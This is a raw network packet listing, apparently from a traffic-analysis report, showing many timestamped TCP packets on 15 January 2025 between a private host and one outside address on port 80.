                                                                                                                                                        Jan 15, 2025 10:18:39.120306015 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120417118 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.120424986 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120568037 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120584011 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.120623112 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120735884 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120754957 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.120861053 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.120969057 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.121090889 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.121093988 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.121293068 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.211658955 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.211875916 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212001085 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212133884 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212250948 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212259054 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.212342978 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212426901 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.212466002 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212603092 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.212609053 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212644100 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212760925 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212877035 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.212939978 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.212992907 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213108063 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213110924 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.213284016 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.213305950 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213411093 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213453054 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.213502884 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213618040 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213737011 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213793993 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.213854074 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.213964939 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.214003086 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214049101 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214170933 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214288950 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214297056 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.214406967 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214466095 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.214529037 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214628935 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214636087 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.214754105 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214864969 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.214981079 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215146065 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.215161085 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215264082 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215312004 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.215367079 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215473890 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215490103 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.215617895 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215656996 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.215684891 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215815067 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.215816021 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.215930939 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.216032028 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.216141939 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.216145992 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.216269016 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.216316938 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.216481924 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.266314983 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.266403913 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.266520977 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.266573906 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.266645908 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.266783953 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.267184973 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.267433882 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.267549992 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.267612934 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.267673016 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.267745972 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.267858028 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.267863035 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268074989 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268104076 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268240929 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268331051 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268448114 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268452883 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.268501043 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.268549919 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.268584967 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268629074 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268759012 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.268798113 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.268898964 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.268914938 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269032001 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269109964 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269228935 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269231081 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.269401073 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269445896 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.269506931 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269617081 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269707918 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.269722939 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269845963 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.269886971 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.269937992 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270050049 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270098925 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.270226002 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270284891 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270370960 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.270392895 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270555019 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270606041 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.270669937 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270824909 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270863056 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.270875931 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.270992041 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.271056890 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.271138906 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.271214008 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.271322966 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.271332026 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.271529913 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.352714062 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.352823973 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.352936983 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353059053 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353096962 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.353173971 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353270054 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.353293896 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353408098 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353527069 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353604078 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353606939 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.353718042 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353779078 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.353825092 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.353945971 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.353965044 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354070902 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354150057 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354294062 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.354294062 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.354311943 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354386091 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354551077 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354644060 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.354676962 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354737997 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354854107 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.354964018 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.355011940 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355133057 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.355181932 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355200052 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355361938 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355475903 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.355477095 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355607033 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355643988 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.355669022 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355788946 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355904102 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.355979919 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.355979919 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.356019020 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356141090 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356255054 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356323004 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.356376886 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356489897 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.356539965 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356648922 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356765985 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356812954 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.356878042 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.356982946 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.357007027 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.357115984 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.357193947 CET804977292.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.357322931 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.357491970 CET4977280192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.437486887 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.437597036 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.437710047 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.437753916 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.437928915 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438008070 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438124895 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438232899 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438265085 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.438354015 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438432932 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.438519001 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438596010 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438602924 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.438692093 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438776016 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.438781977 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438899994 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.438942909 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.439017057 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439130068 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439285994 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.439294100 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439482927 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439526081 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439619064 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.439670086 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439784050 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439790964 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.439908981 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.439959049 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.440010071 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.440071106 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.440181971 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.440298080 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.440300941 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.440355062 CET804977092.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.440469980 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.440640926 CET4977080192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.482897043 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.482996941 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483129025 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483170986 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.483231068 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483361006 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483366966 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.483480930 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483551025 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483674049 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.483717918 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.483808994 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.483889103 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484131098 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484232903 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484328032 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.484369040 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484518051 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.484558105 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484570980 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484730005 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.484811068 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.484847069 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485060930 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.485136986 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485420942 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485527992 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485671997 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485671997 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.485816002 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485857010 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.485872984 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.485981941 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486036062 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.486107111 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486221075 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486323118 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486330032 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.486519098 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486526012 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.486565113 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486701012 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486747026 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.486792088 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.486908913 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487010956 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.487051964 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487179041 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487256050 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487315893 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.487422943 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487489939 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487514973 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.487623930 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487674952 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.487725973 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487843037 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.487962961 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.488039017 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488146067 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488250971 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.488260984 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488353968 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488421917 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.488470078 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488590002 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488683939 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.488709927 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488825083 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.488920927 CET4977180192.168.11.2092.255.57.112
                                                                                                                                                        Jan 15, 2025 10:18:39.488961935 CET804977192.255.57.112192.168.11.20
                                                                                                                                                        Jan 15, 2025 10:18:39.489082098 CET804977192.255.57.112192.168.11.20
